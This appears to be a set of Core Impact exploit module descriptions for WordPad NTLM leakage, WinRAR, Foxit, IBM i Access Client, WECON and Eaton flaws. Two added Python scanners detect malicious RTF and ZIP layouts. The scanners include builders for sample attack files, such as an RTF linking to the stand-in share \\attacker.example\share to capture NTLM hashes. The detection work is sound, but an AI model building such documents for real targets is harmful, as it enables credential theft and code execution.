This exploit leverages an information disclosure vulnerability in Microsoft WordPad. The vulnerability lies in legacy functionality that converts an OLE 1.0 storage object (OLESTREAM) to the newer IStorage format. By crafting a document containing a malicious OLE 1.0 LinkedObject whose link target points at an untrusted server, an attacker can coerce WordPad into authenticating to that server and capture the NTLM hash of the user who opened the document. This exploit does not install an agent; it obtains the NTLM hash of a legitimate user, which can then be cracked offline or relayed.
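The link target that causes the outbound authentication lives in the OLE 1.0 object header (TopicName) and in the NetworkName field of the LinkedObject that follows it. The Python below is an added example, not code from Core Impact or from this page: it decodes the \objdata groups of an RTF document, parses the OLE 1.0 header according to the MS-OLEDS layout (OLEVersion, FormatID, three length-prefixed strings, then NetworkName for linked objects; the presentation object is ignored), and reports LinkedObjects whose target is a UNC path. The structure layout, the hostname attacker.example and both RTF samples are assumptions constructed for the example.

```python
"""Scan OLE 1.0 (OLESTREAM) objects embedded in RTF for LinkedObjects whose
link target is a UNC path, the layout that makes WordPad authenticate to a
remote host. Field layout per MS-OLEDS 2.2.4-2.2.6 (assumed here); the sample
documents at the bottom are constructed for this example."""
import re
import struct

OLE1_VERSION = 0x00000501
OLE1_FORMAT_LINKED = 0x00000001    # ObjectHeader is followed by a LinkedObject
OLE1_FORMAT_EMBEDDED = 0x00000002  # ObjectHeader is followed by an EmbeddedObject


def _lp_string(s: bytes) -> bytes:
    """LengthPrefixedAnsiString: 4-byte length counting the NUL, then the NUL-terminated
    bytes (a length of 0 encodes the empty string with no string bytes at all)."""
    if not s:
        return struct.pack("<I", 0)
    return struct.pack("<I", len(s) + 1) + s + b"\x00"


def _read_lp_string(buf: bytes, off: int):
    (length,) = struct.unpack_from("<I", buf, off)
    off += 4
    if off + length > len(buf):
        raise ValueError("truncated LengthPrefixedAnsiString")
    return buf[off:off + length].rstrip(b"\x00"), off + length


def build_ole1_object(format_id: int, class_name: bytes, topic_name: bytes,
                      item_name: bytes = b"", network_name: bytes = b"") -> bytes:
    """Constructed ObjectHeader (+ LinkedObject fields when linked); presentation object omitted."""
    data = struct.pack("<II", OLE1_VERSION, format_id)
    data += _lp_string(class_name) + _lp_string(topic_name) + _lp_string(item_name)
    if format_id == OLE1_FORMAT_LINKED:
        # NetworkName, Reserved (4 bytes), LinkUpdateOption (4 bytes)
        data += _lp_string(network_name) + struct.pack("<II", 0, 1)
    return data


def parse_ole1_header(buf: bytes) -> dict:
    """Parse ObjectHeader and, for linked objects, the NetworkName that follows it."""
    version, format_id = struct.unpack_from("<II", buf, 0)
    if version != OLE1_VERSION:
        raise ValueError("not an OLE 1.0 object header")
    off = 8
    class_name, off = _read_lp_string(buf, off)
    topic_name, off = _read_lp_string(buf, off)
    item_name, off = _read_lp_string(buf, off)
    obj = {"format_id": format_id, "class_name": class_name,
           "topic_name": topic_name, "item_name": item_name, "network_name": b""}
    if format_id == OLE1_FORMAT_LINKED:
        obj["network_name"], off = _read_lp_string(buf, off)
    return obj


def is_unc_path(path: bytes) -> bool:
    return path.startswith(b"\\\\")


def coercion_targets(rtf: bytes) -> list:
    """UNC targets of every OLE 1.0 LinkedObject found in the \\objdata groups of an RTF document."""
    targets = []
    for m in re.finditer(rb"\\objdata\s*([0-9A-Fa-f\s]+)", rtf):
        hex_text = re.sub(rb"\s", b"", m.group(1)).decode("ascii")
        try:
            obj = parse_ole1_header(bytes.fromhex(hex_text))
        except (struct.error, ValueError):
            continue  # malformed or not OLE 1.0; a production scanner would log this too
        if obj["format_id"] != OLE1_FORMAT_LINKED:
            continue
        for path in (obj["topic_name"], obj["network_name"]):
            if is_unc_path(path):
                target = path.decode("latin-1")
                if target not in targets:
                    targets.append(target)
    return targets


def build_rtf(ole1_blob: bytes) -> bytes:
    """Wrap an OLE 1.0 blob in a minimal RTF object group (constructed sample document)."""
    return (b"{\\rtf1{\\object\\objautlink\\objupdate{\\*\\objdata "
            + ole1_blob.hex().encode("ascii") + b"}}}")


# Constructed samples: a linked object pointing at an attacker host, and an ordinary embedded object.
ATTACKER_SHARE = b"\\\\attacker.example\\share\\doc.txt"  # assumed hostname, not a real target
MALICIOUS_RTF = build_rtf(build_ole1_object(OLE1_FORMAT_LINKED, b"Package", ATTACKER_SHARE,
                                            network_name=ATTACKER_SHARE))
BENIGN_RTF = build_rtf(build_ole1_object(OLE1_FORMAT_EMBEDDED, b"Package", b"C:\\Users\\me\\notes.txt"))

if __name__ == "__main__":
    print(coercion_targets(MALICIOUS_RTF))  # ['\\\\attacker.example\\share\\doc.txt']
    print(coercion_targets(BENIGN_RTF))     # []
```

Only the header and NetworkName are parsed, which is enough to decide whether a document can cause an outbound SMB/WebDAV authentication; anything that fails to parse is skipped here but should be logged by a real scanner, since a deliberately malformed object is itself a signal.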
WinRAR versions prior to 6.23 contain a vulnerability that allows attackers to execute arbitrary code when a user opens a seemingly harmless file inside a ZIP archive. The archive contains a benign file, such as an ordinary .PDF, together with a folder that carries the same name as that file. When the user tries to open the benign file, WinRAR also processes the contents of the same-named folder, which may include executable content, and arbitrary code is executed.
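A quick structural check for archives built in the pattern just described (a benign-looking file plus a directory of the same name, usually differing only by a trailing space, holding an executable script), added here as an example and not part of Core Impact or the original page. It uses only Python's standard library; the archives it scans are constructed in memory, and the list of executable extensions treated as payloads is an assumption.

```python
"""Flag ZIP archives where a file entry and a directory share a name (after
folding trailing spaces) and the directory contains executable-looking content.
Added example; the archives at the bottom are constructed, not real samples."""
import io
import zipfile

# Assumed list: extensions that turn a name collision into a likely payload.
EXECUTABLE_EXTENSIONS = (".cmd", ".bat", ".exe", ".vbs", ".js", ".ps1", ".scr", ".com", ".lnk")


def _normalize(name: str) -> str:
    """Fold the trailing-space trick so 'invoice.pdf ' and 'invoice.pdf' compare equal."""
    return name.rstrip(" ").lower()


def name_collisions(zip_bytes: bytes) -> list:
    """Return [(file_entry, [entries under the same-named directory]), ...] for a ZIP image."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()

    files = [n for n in names if not n.endswith("/")]
    # Map every directory prefix (explicit "dir/" entries or implied by nested paths) to its members.
    members = {}
    for n in names:
        parts = n.split("/")
        for i in range(1, len(parts)):
            prefix = "/".join(parts[:i])
            key = _normalize(prefix)
            members.setdefault(key, [])
            if n != prefix + "/":
                members[key].append(n)

    hits = []
    for f in files:
        key = _normalize(f)
        if members.get(key):  # a non-empty directory shares this file's (normalized) name
            hits.append((f, sorted(members[key])))
    return hits


def likely_payload_collisions(zip_bytes: bytes) -> list:
    """Narrow collisions to those where the directory holds an executable-looking file."""
    return [(f, m) for f, m in name_collisions(zip_bytes)
            if any(_normalize(x).endswith(EXECUTABLE_EXTENSIONS) for x in m)]


def build_zip(entries) -> bytes:
    """Build an in-memory ZIP from (name, data) pairs (constructed samples only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries:
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples: the decoy/folder layout, and an ordinary archive.
MALICIOUS_ZIP = build_zip([
    ("invoice.pdf ", b"%PDF-1.4\n%decoy\n"),
    ("invoice.pdf /invoice.pdf .cmd", b"@echo off\r\necho stand-in payload\r\n"),
])
BENIGN_ZIP = build_zip([
    ("invoice.pdf", b"%PDF-1.4\n"),
    ("attachments/readme.txt", b"hello\n"),
])

if __name__ == "__main__":
    print(likely_payload_collisions(MALICIOUS_ZIP))
    print(likely_payload_collisions(BENIGN_ZIP))
```

The two-stage split is deliberate: name_collisions reports any file/directory name clash, which is rare in legitimate archives and cheap to triage, while likely_payload_collisions is the narrower signal suited to an automatic block at a mail gateway.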
Foxit PDF Reader exposes a JavaScript interface capable of writing arbitrary files, which is what makes the software susceptible to attack. An adversary can abuse this to execute code in the context of the current user and gain unauthorized control over the system. The vulnerable method is exportXFAData. This exploit writes the agent to the user's Startup folder, so the user must log off and log in again before the agent runs.
IBM i Access Client Solutions is vulnerable to DLL hijacking when certain features that rely on native code are run on a Windows operating system. IBM has addressed this CVE by providing a fix for IBM i Access Client Solutions. The attacker must entice a victim into opening a specially crafted .hod, .bchx, .ws, .dttx or .dtfx file. This file and the accompanying binary (the DLL that gets loaded in place of the legitimate one) may be delivered to the user through a remote WebDAV share or a zipped attachment. An attacker may exploit this issue to execute arbitrary code.
A stack-based buffer overflow in WECON LeviStudioU allows an attacker to execute arbitrary code via a crafted .XML file. This module runs a malicious web server on the Core Impact Console and waits for an unsuspecting user to trigger the exploit by connecting to it.
Eaton HMISoft is prone to a buffer overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data when parsing a crafted .VU3 document. This module runs a malicious web server on the Core Impact Console and waits for an unsuspecting user to trigger the exploit by connecting to it.